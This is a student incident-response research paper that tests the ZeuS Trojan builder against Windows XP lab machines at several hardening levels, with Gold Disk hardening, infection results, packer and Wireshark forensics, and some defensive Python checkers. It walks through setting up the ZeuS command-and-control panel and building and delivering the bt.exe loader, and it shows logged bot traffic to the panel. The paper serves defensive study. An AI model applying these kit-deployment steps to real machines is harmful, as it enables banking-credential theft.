Page 1: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

CIS 6395 Incident Response Technologies

How effective are Do-It-Yourself Trojan Kits

(i.e., ZeuS Builder)

By Kevin Kerkvliet


Abstract

This project demonstrates how a critical computing resource can be compromised. Many agencies have security personnel and procedures in place to authorize computing devices to operate at a given security classification and to process sensitive data. The goal was to measure how effective a do-it-yourself Trojan kit is against both a common, unhardened computer and a DoD-hardened computer, and to observe how well the common countermeasures deployed against such attacks hold up. Using an Attacker computer and a Victim computer on the same network, the functions of ZeuS Builder were examined for their capability. The kit proved simple to use but hard to configure: obtaining the software package involves many obstacles, and it ships with very little useful documentation on how to use it. Testing iterations were run against different levels of protection on the Victim, each configured as a VirtualBox guest for this exercise.

The following are the protection levels tested for the Victim:

Standard XP OS (no service pack) and no AV

Standard XP OS (no service pack) with AV

Standard XP OS (service pack 3) with installed updates and no AV

Standard XP OS (service pack 3) with installed updates and AV

Hardened XP OS with updates and AV at low classification level

Hardened XP OS with updates and AV at high classification level

The Attacker platform was a personal web server, used strictly within the boundaries of this educational experiment.


A DoD Gold Disk¹ was used to harden the OS in two of the scenarios. Retina² is shown in this report, but it was not executed once it became clear that hardening the operating system is not the primary defense against this kind of attack; the primary defense is a good antivirus product and good user awareness training. The digital forensic tools used for this experiment were IDA Pro 5³ and Wireshark⁴. Other tools used were secondary choices and are reported in the sections "Other Quick Analysis" and "Forensics Analysis". This process determines how useful each tool is and how applicable it is to finding evidence that correlates with the hacking activity.

1 http://www.disa.mil/services/ia.html

2 http://www.eeye.com/Retina

3 http://www.hex-rays.com/idapro/

4 http://www.wireshark.org


Table of Contents

Project Goal
Gold Disk Preparation
Gold Disk Second System Configuration
Retina Process
Background Information about Zeus
Zeus Configuration
Zeus Attacks
Forensics Analysis
  Wireshark
  IDA Pro 5
    bt.exe
    zse.exe
Other Quick Analysis
  InCtrl5
  Winmerge List dlls
  Winmerge Procmon
  WinMerge TCPView
  Rootkit Revealer
  Inspection of the cp.php and gate.php
The Answer is to use the zse.exe to see infection and fix it
Conclusion
References


Project Goal

The goal of this experiment is to execute the Zeus malware on the XP platform. The actions it takes will be examined to see what can be collected by the web server, and the infected host will be searched for the impact of the client-side malware. Digital forensics tools will be used to find the clues that reveal what is occurring and help define the characteristics of Zeus.

Various levels of security on the XP platform will be tried to see whether the impact differs with each security configuration. Tools will be used to configure XP to these various levels, and the DoD build is part of this experiment.

There is a notion that "script kiddie" kits can make the average computer user as dangerous as a professional hacker. This experiment will tell how accurate that is in the case of the Zeus system. Zeus is a software kit with some configuration options and some pricing options for extra features. The required user ability level (easy, moderate, or difficult) will be a subjective rating.

Any countermeasures discovered will be considered and reported to show how the Zeus system could perhaps be prevented. Special or routine information assurance principles and practices (confidentiality, integrity, and availability [CIA]) should be considered.


Gold Disk Preparation

Gold Disk has three Asset Posture benchmarks that you can harden your system to: Mission Critical, Mission Support, or Administrative. Each has a subcategory of Classified, Public, or Sensitive. For this exercise I used Administrative and Public for one trial and Mission Critical and Classified for another trial.

Once the selection is made, click Evaluate Asset and it runs all the scripts looking for vulnerabilities at the selected level. After the scripts have run you get a report of the open vulnerabilities in the categories CAT I (red), CAT II (orange), and CAT III (yellow), with green for items that are already taken care of.

The figure below is the initial screen before evaluation is performed.


This shows the baseline assessment being executed.

This is the program's result, showing how many open issues there are to solve.


The report for a system with XP SP3 (with all recent Windows updates) and Symantec Endpoint Protection version 11 still shows twelve CAT I and one hundred ninety-two CAT II findings. CAT III/IV findings are low risk and by DoD policy can be mitigated by other security policies that reduce or eliminate the finding. On this system there are twenty-nine CAT III findings.

The next step is to fix the OS to the point where there are no CAT I or CAT II findings. There are automatic ways to do this, but stepping through the Gold Disk a few times is a manual process, because it is possible to lock the system down to the point where it is unusable and worthless. Take the extra time to record the steps performed so you can back them out if needed. A Remediate button continues the process.

Once all the scripts have run for the first iteration, rerun the Gold Disk utility to see which findings are still open and which require manual configuration changes that the scripts were unable to make. Repeat the process until the findings are closed and the report comes back green with no CAT I or CAT II findings. The Unknown category relates to network policies and best-practice documentation showing the posture of the system and network architecture; these unknown findings need to be assessed by a person and certified as having been done correctly.


You must expand the directory tree to reach the section you are trying to fix. It is color coded so you can easily find the security holes to fix.

Next, a box of scripts pops up to fix the problems for you.


More scripts, showing how they change the registry for you.

The example shows the Passwords section and the categories within it to be fixed.


The scripts that will be run to secure the password issues.

Below are more scripts showing other modifications to the system registry.


After the first iteration of this process there are three CAT I and forty CAT II findings.

Iteration   CAT I   CAT II   CAT III   CAT IV   Closed   Unknown
Baseline    12      192      29        0        242      204
First       3       40       6         0        426      204


Help with closing a finding is given by selecting the finding and reviewing the details of the item. The Description, Discussion, Details, Detection, Remediation, Notes, Impact/Mitigation, and Misc tabs each give a section of information that can be used to reach the desired effect and assist the user in securing the vulnerability.

The Local Security Settings utility under Administrative Tools in the Control Panel helps change the system settings. NSA also provides security templates and a policy editor to make these changes all at once, but I am doing it manually since I am only doing it once for this project. In a batch I would take my template from the first machine I configure and apply it to the rest of the like machine assets. Running the Microsoft Management Console (MMC) by typing mmc in the Run box gives the tool sets required to make modifications to the system: you add the snap-ins to the MMC and then change the settings as directed by Gold Disk. If you want to work on the fly and not make a reusable template, you can run the policy editor by entering gpedit.msc in the Run box and make the manual changes as appropriate. REGEDIT also needs to be used, since the templates can't do it all; some folder security permissions will be modified with REGEDIT.


Below is an example of the Details tab for the CAT I finding under Accounts.

Below is an example of the Remediation tab, showing how to fix the problem manually.


Gold Disk runs scripts and uses generic network strategies suggested by experts, which will differ from the unique network you configure, so you will see some false positives come back from the utility. Normally when a false positive is found you have to report it and justify why it is treated as such. Your security documentation will show that there is a proper check in place to deal with the flaw, or that the finding is not valid. In this case I have a few, such as "User Right / II / User Rights Assignments - Administrators have auditing rights." I am not going to create an Auditors group, so this is acceptable for this finding; there will be no impact for the purposes of this experiment. It would be documented as such and put into the policy for approval.

After the second iteration of running the Gold Disk, closing the open findings gets you to a solution that is almost complete: zero CAT I findings, two CAT II findings, zero CAT III findings, zero CAT IV findings, and one hundred sixty unknown findings. The unknown findings are a mixture of all CAT I/II/III/IV levels. Looking into the unknown items, eighteen relate to antivirus (AV). Those AV items are not relevant, since an approved DoD AV was installed and configured to meet the manual checks required here. One "Accounts" finding was unknown and relates to a manual check ensuring passwords are fifteen characters and changed at least once a year; it has you use DUMPSEC to check this, and the passwords were compliant with this CAT II finding. One "Auditing" finding was unknown and required a manual registry modification to ensure failure audits are being done correctly. Documentation becomes a big portion of this validation process.


Below is the summary of the second iteration.

There are thirty-four "IAVM-A" unknown findings related to patches that need to be verified manually; all are CAT I except nine that are CAT II. There are fifty-four "IAVM-B" unknown findings; I noticed that many are false positives, meaning the findings are flagged for software that is not installed on the system. There are twenty-nine "IAVM-T" unknown findings. There are nineteen Manual findings that require you to look into policy documentation or known checks that can't be detected automatically; this requires interviewing the system administrator to discover how the vulnerability is being managed. There are two "Misc Security Updates" unknown findings that are simple management issues. There are two "Patches" unknown findings related to patch management and network security mitigation through firewall usage. There are two "Security Options" unknown findings that are not important to check (display banner and printer sharing). There are two CAT III Services unknown findings which ask that shared games and MSN be removed.

There are twelve "USB Devices" unknown findings that discuss the security posture and use of USB devices within the system, and two "Windows Firewall" unknown findings that are simple CAT III registry checks.

This table summarizes the unknown findings and which CAT they belong to.

Category                CAT I   CAT II   CAT III   Unknown Total
Antivirus               4       12       3         19
Desktop Application     2       16       8         26
Accounts                -       1        -         1
Auditing                -       1        -         1
IAVM-A                  25      9        -         34
IAVM-B                  30      24       -         54
IAVM-T                  8       20       1         29
Manual                  5       11       3         19
Misc Security Updates   -       2        -         2
Patches                 -       2        -         2
Security Options        -       1        1         2
Services                -       -        2         2
USB Devices             1       2        9         12
Windows Firewall        -       -        2         2
Totals                  75      101      29        205


Gold Disk Second System Configuration

The low security option is very similar to the high classification one.

The report for a system with XP SP3 (with all recent Windows updates) and Symantec Endpoint Protection version 11 shows eleven CAT I and one hundred ninety-three CAT II findings. CAT III/IV findings are low risk and by DoD policy can be mitigated by other security policies that reduce or eliminate the finding. On this system there are twenty-nine CAT III findings. This is similar to the higher classification system.

This table shows the difference between the high level and the low level after the baseline assessment is executed.

Posture          CAT I   CAT II   CAT III   CAT IV   Unknown
I - Classified   12      192      29        0        204
III - Public     11      193      29        0        201


Below is the result after running the first iteration of the Gold Disk.

Below is the final result of the Gold Disk process for the low classification system.


Retina Process

Retina is a very intensive registry scanner that flags settings based on the optional audits selected. For this experiment Retina would add no value unless the Gold Disk failed to provide protection from the Zeus attack. In DoD practice Retina is run after the Gold Disk as a double check on the integrity of the hardening process; using more than one tool is good practice and is often done for DoD systems. I have simple documentation of the setup and practical issues of Retina; however, I did not provide summary results for this exercise.

Retina is pretty simple to use. Some configuration needs to be in place for the scanning engine to access the files, but after that it is a couple of buttons and a report that shows each finding with some help on how to close it. Just like Gold Disk and other applications, there are flaws and false positives to consider when analyzing the reports.

The key is to configure the server and client machines properly.

1. Credentials
   a. Use Domain Administrator credentials, or local admin credentials for the target machine.
   b. Verify that the password you are using is correct.
   c. Remember to include the domain if necessary. Enter credentials into Retina as DOMAINNAME\USERNAME.

2. Services
   a. Make sure that the "Server" service and the "Remote Registry" service are running on both the scanner and target machines.

3. Ports
   a. Make sure that you can ping the target machine from the scanner.
   b. From a command prompt execute netstat -an and make sure that the following ports are listening:
      i. TCP 135, UDP 137, TCP 139 and TCP 445

4. Local Security Policy
   a. Verify that the NTLM settings are the same for both the scanner and the target. To do this:
      i. Go to Start -> Control Panel -> Administrative Tools -> Local Security Policy
      ii. Under Local Policies go to Security Options
      iii. Open the policy "Network security: LAN Manager authentication level"
      iv. Verify that the NTLM setting is the same for both scanner and target. If not the same, change the setting so that they are equal.

5. Simple File Sharing
   a. If scanning a Windows XP target, you must turn on Simple File Sharing. To do this:
      i. Open Windows Explorer. Go to Tools -> Folder Options.
      ii. Select the View tab, scroll down to "Simple File Sharing" and make sure it is selected.
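Steps 3 and 4 above can be checked mechanically before a scan is queued. The following is an added example, not code from the report or from Retina: it parses `netstat -an` output (a constructed Windows XP sample is embedded; the addresses are placeholders) for the four required ports and compares the LAN Manager authentication level of scanner and target. On a real host that level is the registry value HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LmCompatibilityLevel behind the policy named in step 4; the example takes it as a plain integer argument so it runs offline.

```python
import re

# Ports the report says must be listening on both the scanner and the target.
REQUIRED = {("TCP", 135), ("UDP", 137), ("TCP", 139), ("TCP", 445)}

# Constructed `netstat -an` output from a Windows XP host (not a real capture).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.56.101:139     0.0.0.0:0              LISTENING
  TCP    192.168.56.101:1040    192.168.56.1:80        ESTABLISHED
  UDP    0.0.0.0:445            *:*
  UDP    192.168.56.101:137     *:*
  UDP    192.168.56.101:138     *:*
"""

# proto, local port, and the optional State column (UDP rows have none).
SOCKET = re.compile(r"^\s*(TCP|UDP)\s+\S+:(\d+)\s+\S+(?:\s+(\S+))?\s*$")


def bound_ports(netstat_output):
    """Return the set of (proto, port) that are LISTENING (TCP) or bound (UDP)."""
    found = set()
    for line in netstat_output.splitlines():
        m = SOCKET.match(line)
        if not m:
            continue                      # header, blank, or unrelated line
        proto, port, state = m.group(1), int(m.group(2)), m.group(3)
        if proto == "TCP" and state != "LISTENING":
            continue                      # ESTABLISHED/TIME_WAIT rows do not count
        found.add((proto, port))
    return found


def missing_ports(netstat_output):
    """Required ports that are not listening, sorted for stable output."""
    return sorted(REQUIRED - bound_ports(netstat_output))


# Meaning of LmCompatibilityLevel 0-5 (the "LAN Manager authentication level" policy).
LM_LEVELS = {
    0: "Send LM & NTLM responses",
    1: "Send LM & NTLM - use NTLMv2 session security if negotiated",
    2: "Send NTLM response only",
    3: "Send NTLMv2 response only",
    4: "Send NTLMv2 response only. Refuse LM",
    5: "Send NTLMv2 response only. Refuse LM & NTLM",
}


def check_prerequisites(scanner_netstat, target_netstat, scanner_lm, target_lm):
    """Return a list of human-readable problems; an empty list means the checks passed."""
    problems = []
    for name, output in (("scanner", scanner_netstat), ("target", target_netstat)):
        for proto, port in missing_ports(output):
            problems.append("%s: %s %d is not listening" % (name, proto, port))
    # The report's rule is equality of the two settings, so that is what is checked.
    if scanner_lm != target_lm:
        problems.append(
            "LAN Manager authentication level differs: scanner=%d (%s), target=%d (%s)"
            % (scanner_lm, LM_LEVELS.get(scanner_lm, "?"),
               target_lm, LM_LEVELS.get(target_lm, "?")))
    return problems


if __name__ == "__main__":
    for p in check_prerequisites(SAMPLE_NETSTAT, SAMPLE_NETSTAT, 3, 5):
        print(p)
```

Feed it the real `netstat -an` text from each side (for example redirected to a file and copied over) and the two registry values; anything printed is a reason the credentialed scan will fail before Retina reports its first finding.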


In the program, the first step is to select your target IP.

The next step is to select the audit type you want to execute. This part is the ports.

This part is the type of OS audits.

This shows how to enter the credentials correctly for the target client.

This shows the job in the queue and running.

The next procedure would be to review the output files and rerun the utility until the report shows the system is clear of any findings. After a Gold Disk execution Retina can still find open findings, though usually not many. It is a good tool to use in practice and makes regular maintenance easier for keeping network devices compliant over time.


Background Information about Zeus

There are some interesting publications about Zeus or its variants, but the practical information is not shared or may not be accurate. I could not find anything presenting just the facts, only the opinions of authors who may or may not be technical IT gurus; the publishing companies' lawyers probably stripped a lot of the key information to protect themselves from potential lawsuits. When looking at the PHP source code of the program I found Russian words throughout the whole code base. The best source of information may be either classified or underground, hiding in the black markets or in other foreign markets that have no laws against software piracy or hacking. So I found some generic opinions from the Internet which may hold some weight but are not fundamentally sound.

Dell owns a website, http://www.secureworks.com, which published an article on Zeus on March 11, 2010⁵. It calls the program a banking Trojan that "steals data from infected computers via web browsers and protected storage." The website is very thorough in explaining what the program does and how it works. The latest version Dell knew of was Zeus 1.3.4.x. I found a couple of variants on forums, but the only working version was Zeus 1.2.7.19, which was the same as the version from Dell's report. Dell gives a good explanation of the variant numbering system. The major concern is that the countermeasure used to detect this malware is the AV, and it may be easily overcome: according to Dell, the next version, 1.4, has polymorphic encryption.

5 http://www.secureworks.com/research/threats/zeus/?threat=zeus


"The 1.4 version of ZeuS will enable the ZeuS Trojan to re-encrypt itself each time it infects a victim, thus making each infection unique. The 1.4 version also enables the ZeuS file names to be randomly generated, thus each infection will contain different file names. This will make it very difficult for anti-virus engines to identify the ZeuS Banking Trojan on the victims' system." - Dell

With this kind of technology in place it is very difficult to put effective countermeasures in place to protect users from the malware.

The table below summarizes Dell's information on the variant numbering, a.b.c.d:

a (1) - a complete change in the bot. This has never changed from 1.
b (3) - major changes that cause complete or partial incompatibility with the previous versions. Recently we moved from version 2 to version 3.
c (2) - bug fixes, improvements, and added features.
d (1) - a small revision in the code to make the malware undetectable by AV vendors.

The main functions that Dell says the Zeus program performs are listed below.

Steals data submitted in HTTP forms

Steals account credentials stored in the Windows Protected Storage

Steals client-side X.509 public key infrastructure (PKI) certificates

Steals FTP and POP account credentials

Steals/deletes HTTP and Flash cookies

Modifies the HTML pages of target websites for information stealing purposes

Redirects victims from target web pages to attacker controlled ones

Takes screenshots and scrapes HTML from target sites

Searches for and uploads files from the infected computer

Modifies the local hosts file (%systemroot%\system32\drivers\etc\hosts)

Downloads and executes arbitrary programs

Deletes crucial registry keys, rendering the computer unable to boot into Windows
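Zeus is listed above as modifying the local hosts file. The following is an added example, not code from the report or from the Zeus kit, of a check an incident responder can run over a copy of %systemroot%\system32\drivers\etc\hosts taken from a suspect host: it flags every hostname redirected to a non-loopback address and every hostname other than localhost that is blackholed to the loopback or unspecified address (pointing vendor update sites at 127.0.0.1 is a common malware pattern in general, not one the report itself observed). The sample file content is constructed and the .test domains are placeholders.

```python
import ipaddress

# Constructed hosts file. The first mapping is the stock XP entry; the
# remaining ones are the kind of line a banking trojan adds.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

127.0.0.1       localhost
192.0.2.10      www.example-bank.test
198.51.100.7    online.example-bank.test   secure.example-bank.test
127.0.0.1       liveupdate.example-av.test   # blocks AV updates
"""

# Names that are legitimately mapped to the loopback address.
LOOPBACK_NAMES = {"localhost", "localhost.localdomain"}


def parse_hosts(text):
    """Yield (ip_address, hostname) pairs; comments and blank lines are skipped.

    A line may carry several hostnames for one address, and a '#' comment
    may follow the mapping, so each line is split only after the comment
    is stripped.
    """
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                      # first field is not an address: junk line
        for host in fields[1:]:
            yield ip, host.lower()


def suspicious_entries(text):
    """Return (hostname, ip, reason) for every mapping a clean XP hosts file would not have."""
    findings = []
    for ip, host in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            # 127.x / ::1 / 0.0.0.0: fine for localhost, a blackhole for anything else.
            if host not in LOOPBACK_NAMES:
                findings.append((host, str(ip), "blackholed"))
        else:
            # Any other address means name resolution for that host is being hijacked.
            findings.append((host, str(ip), "redirected"))
    return findings


if __name__ == "__main__":
    for host, ip, reason in suspicious_entries(SAMPLE_HOSTS):
        print("%-12s %-28s -> %s" % (reason, host, ip))
```

The redirect findings are the ones that matter for a banking Trojan: a bank's hostname resolving to an address the bank does not own is the hosts-file version of the page-modification and redirection functions in the list above.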

The concept of how it works is pretty simple. A web server with a MySQL database for saving captured information sits out on the Internet somewhere. An executable file is sent to an unsuspecting victim by some kind of scheme, such as opening an unknown mail attachment, which installs a Trojan program. Once the program is running on the victim's machine it starts sending the types of information that the web server is listening for, and the server records them in its database. In my experiment I did not see success in my database like Dell did.


Zeus Configuration

The first step in configuration was to find a good source for the files, which will not be disclosed in this report. There are two parts to the Zeus system. There is a client program used to configure a "cfg.bin" and a "bt.exe" file; its GUI is basic and has simple functions to detect whether the virus is present, to clean the virus, and to generate the virus. The second part of the Zeus system is the web server portion, whose primary focus is data collection and command and control of the acquired systems.

The web server files were packed in a file called upload.zip containing the files required to set up the web host. The file was uploaded to a host web server with MySQL services, unpacked, and made ready to execute online after the proper database and database user account were established for Zeus.

You also have to change the permissions on the folder structure to 777 to give the program complete access to install and run correctly. Mode 777 makes every file world-writable, so this is acceptable only on an isolated lab host such as the one used here.


Afterwards you go to the browser and enter the path to the install file, "install/index.php", which opens a PHP form; the form to complete is shown below.

In this case I used ucf as the database name and user account name. You also need to enter the provided encryption key to protect the program and data. After the Install button is clicked, it automatically configures the web server for the Zeus web services, generating all the database files and tables used to store what the Trojan client program sends to it. It takes a few seconds to complete, and the web browser reports the status of each item it has just completed. Inspecting the web server's database contents and file folders shows what the "install/index.php" script has just done for you automatically. Below are the status screenshot and a listing of the database tables created in this step.


Now everything is set up for capturing and storing the data for the Zeus system. You can log into the web server on the web host to view the command and control GUI, which also gives the status of your captured systems reporting to this web server over the Internet.


The client side of the Zeus system is the utility that will configure the malware and

detect and clean the Zeus virus from the client machine. Once you open the program utility

you will get the default Information screen stating it detects no virus or it does and a button to

clean it if needed. Upon the need to clean it you will have to restart the computer. The builder

tab gives the option to make the malware. You click on ŖEdit Configŗ button and get to

modify to the default config.txt file to meet your needs. I selected ŖReplace_Allŗ and replaced

with the correct path the web host as seen below.

After inspecting config.txt as in the picture above, you will find that the link underneath the highlighted area requests a file called "ip.php." I could not find that file in the web server's file directory or in the package files from the source I received them from. It may be the reason why my web server has not received any of the traffic from the infected host in my trials and why my database remains empty. Moving forward with a ninety-percent solution, we save the text file and close it. The next step is to click the "Build Config" button; the utility runs its procedures and creates a "cfg.bin" file, the compiled form of the configuration that is served from the web server to complete the web-side setup. Sample screenshots demonstrating this are below.

Once that is complete, upload this "cfg.bin" file to the web server in the same directory where the other Zeus files reside. In theory it should work, but there is that one missing file that I could not decipher or find as part of this configuration.

The remaining step is to click the "Build loader" button to make the malware executable. This is seen in the screenshot below.

The "bt.exe" file is created; an attacker then has to craft a scheme to get it to potential victims to execute. For this experiment it was simply uploaded to the web server so the host computers could download it.


Zeus Attacks

The attacks were very simple to execute: the link on the web server was accessed and the file was downloaded and run where possible. There was no elaborate scheme to mask the malware file. The following screenshots are labelled impacted or not impacted to give a quick overview of the experiment. The behaviour of each preconfigured system makes it obvious whether the "bt.exe" malware affected the system or not.

Standard XP with no service packs or AV - Not Impacted

Standard XP with no service packs and AV - Not Impacted

Standard XP OS with SP3, Windows Updates and AV - Not Impacted

Standard XP OS with SP3, Windows Updates and no AV - Impacted

After a manual reboot this system blue-screened on every start, in a loop.

Hardened XP OS Low Class with SP3, Windows Update and AV - Not Impacted

Hardened XP OS High Class with SP3, Windows Update and AV - Not Impacted

The following table summarizes the screenshots.

OS Configuration                                            Impacted / Not Impacted
Standard XP with no service packs or AV                     Not Impacted
Standard XP with no service packs and AV                    Not Impacted
Standard XP OS with SP3, Windows Updates and AV             Not Impacted
Standard XP OS with SP3, Windows Updates and no AV          Impacted
Hardened XP OS Low Class with SP3, Windows Update and AV    Not Impacted
Hardened XP OS High Class with SP3, Windows Update and AV   Not Impacted

The "bt.exe" malware visibly impacted only one of the six OS configurations. From this we can see that signature AV with current updates plays an important role in discovering and preventing this version of the malware, and that somewhere between the unpatched install and the fully updated one a condition arises that this malware version is able to take advantage of. Two caveats apply when reading the table: "Impacted" means observable misbehaviour on the host (the crash and BSOD loop), not confirmed data theft, and since the control panel database stayed empty throughout the trials (see the missing "ip.php" above), none of the runs could be confirmed from the server side.

Forensics Analysis

To discover what was going on behind the scenes, the tools Wireshark, IDA Pro 5.0, PEiD, the Ultimate Packer for eXecutables (UPX) and the ones listed in the section "Other Quick Analysis" were used to gather details of the malware. In addition, the PHP source code was examined for clues.

PEiD was used to check whether the "bt.exe" file or the client utility executable "zse.exe" is packed. For "bt.exe" PEiD returned "Nothing found *", so no known packer signature matched. Therefore we do not have to worry about IDA Pro 5 failing to reach all of the assembly code or getting lost in an unrecognized compression stub. Note that a signature scanner's "Nothing found" only means no known stub was recognised; a custom or modified packer produces the same answer, so a per-section entropy check is the more reliable test of whether code is really present in the clear.

Looking at the client utility executable, PEiD reports "UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo" as the packer type and version, so it is packed. The next step was to unpack it. The correct procedure is to use the same packer's own decompression (upx -d) with a version compatible with the one detected.

With the UPX utility I unpacked the "zse.exe" client builder utility and prepared it to be examined by IDA Pro.
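The PEiD result above is a signature match, and "Nothing found" is inconclusive on its own. The following is an added example (not part of the paper, and not a tool the paper used) of the check a practitioner would pair with it: parse the PE section table directly and score each section's Shannon entropy, so that a renamed or unknown packer still stands out. The three PE images are constructed in memory as fixtures; the section names, sizes and filler bytes are assumptions, not taken from "bt.exe" or "zse.exe".

```python
"""Added example: a packer check that does not rely on PEiD's signature database.

Walks the PE section table, reports each section's Shannon entropy and flags
sections whose names belong to well-known packers or whose entropy is that of
compressed or encrypted data. The three images are constructed in memory as
fixtures (header-valid, not loadable); they are not the paper's samples.
"""
import hashlib
import math
import struct

SECTION_HDR = struct.Struct("<8sIIIIIIHHI")      # IMAGE_SECTION_HEADER (40 bytes)
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata",
                        ".MPRESS1", ".MPRESS2", ".vmp0", ".vmp1", ".nsp0", ".nsp1"}


def shannon_entropy(data):
    """Bits per byte; 8.0 is uniform random, typical x86 code is around 6."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image):
    """Return [(name, raw bytes)] from a PE image, following e_lfanew and
    SizeOfOptionalHeader rather than assuming fixed offsets."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    sections = []
    for i in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr, *_ = SECTION_HDR.unpack_from(
            image, table + i * SECTION_HDR.size)
        sections.append((name.rstrip(b"\0").decode("latin-1"),
                         image[raw_ptr:raw_ptr + raw_size]))
    return sections


def packer_report(image, high_entropy=7.0):
    """Per-section verdicts: a name match is a hint, an entropy match is evidence."""
    report = []
    for name, data in parse_sections(image):
        entropy = shannon_entropy(data)
        flags = []
        if name in PACKER_SECTION_NAMES:
            flags.append("known packer section name")
        if entropy >= high_entropy:
            flags.append("high entropy (compressed/encrypted)")
        report.append({"section": name, "size": len(data),
                       "entropy": round(entropy, 2), "flags": flags})
    return report


def likely_packed(image):
    return any(entry["flags"] for entry in packer_report(image))


# ---- constructed fixtures (assumed layout, not real samples) ----------------
def build_pe(sections):
    """Minimal PE32 image from [(name, data)]: DOS stub, file header, 0xE0-byte
    optional header, section table, 0x200-aligned raw data."""
    e_lfanew, opt_size = 0x40, 0xE0
    header_end = e_lfanew + 24 + opt_size + len(sections) * SECTION_HDR.size
    raw_ptr = (header_end + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt_hdr = struct.pack("<H", 0x10B).ljust(opt_size, b"\0")
    table, body, va = b"", b"", 0x1000
    for name, data in sections:
        raw_size = (len(data) + 0x1FF) & ~0x1FF
        table += SECTION_HDR.pack(name.encode().ljust(8, b"\0"), len(data), va,
                                  raw_size, raw_ptr + len(body), 0, 0, 0, 0, 0x60000020)
        body += data.ljust(raw_size, b"\0")
        va += max(raw_size, 0x1000)
    return (dos + b"PE\0\0" + file_hdr + opt_hdr + table).ljust(raw_ptr, b"\0") + body


def pseudo_random(n, tag):
    """Deterministic high-entropy filler (hash chain), standing in for packed data."""
    out, i = b"", 0
    while len(out) < n:
        out += hashlib.sha256(b"%s:%d" % (tag, i)).digest()
        i += 1
    return out[:n]


CLEAN_PE = build_pe([(".text", bytes(range(64)) * 64), (".data", b"ucf\0" * 256)])
PACKED_PE = build_pe([("UPX0", b""), ("UPX1", pseudo_random(4096, b"upx"))])
# Renamed sections defeat the name check but not the entropy check.
STEALTH_PE = build_pe([(".text", pseudo_random(2048, b"custom")), (".rsrc", b"\0" * 512)])

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_PE), ("upx", PACKED_PE), ("renamed", STEALTH_PE)):
        print(label, likely_packed(image), packer_report(image))
```

On a real file, read it with `open(path, "rb").read()` and pass the bytes to `packer_report`; the UPX0/UPX1 pair with an empty UPX0 is what a UPX-packed "zse.exe" presents, while a "bt.exe" whose sections have ordinary names but entropy near 8 would be the case PEiD's "Nothing found" misses.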

Wireshark

The Wireshark analysis started with capturing on the interface of the Mac OS host for nine hours and forty-five minutes after "bt.exe" was executed on the "Standard XP OS with SP3 and Windows Updates and no AV" configuration. The capture file was filtered to display only the traffic from the infected host to the web server. The filter used in Wireshark was "ip.dst == xxx.xxx.xxx.xxx && ip.addr eq 192.168.1.109", where xxx.xxx.xxx.xxx is the web server's address, masked in this report; it is a valid public web-hosting IP address. The summary statistics are shown below.

Below is a sample of the Wireshark packet list from the host to the web server, to give a pattern of what is happening between the infected host and the web server.

No. Time Source Destination Protocol NT SMBs Info
10 0.671484 192.168.1.109 xx.xxx.xxx.xx TCP clvm-cfg > http [FIN, ACK] Seq=1 Ack=1 Win=64858 Len=0
12 0.818177 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 SACK_PERM=1
27 1.117772 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [ACK] Seq=1 Ack=1 Win=65535 Len=0
28 1.118682 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php HTTP/1.0
41 1.495183 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [ACK] Seq=198 Ack=679 Win=64858 Len=0
42 1.499518 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [FIN, ACK] Seq=198 Ack=679 Win=64858 Len=0
43 1.500482 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 SACK_PERM=1
49 1.803196 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [ACK] Seq=1 Ack=1 Win=65535 Len=0
50 1.803987 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php?m=login HTTP/1.0
62 2.199615 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [ACK] Seq=206 Ack=1774 Win=65535 Len=0
64 2.202123 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [ACK] Seq=206 Ack=1775 Win=65535 Len=0
65 2.204872 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [FIN, ACK] Seq=206 Ack=1775 Win=65535 Len=0
66 2.206144 192.168.1.109 xx.xxx.xxx.xx HTTP POST /ucf/gate.php HTTP/1.1
72 2.577154 192.168.1.109 xx.xxx.xxx.xx TCP netmap_lm > http [ACK] Seq=514 Ack=222 Win=65093 Len=0
298 7.471422 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 SACK_PERM=1
307 7.583562 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [ACK] Seq=1 Ack=1 Win=65535 Len=0
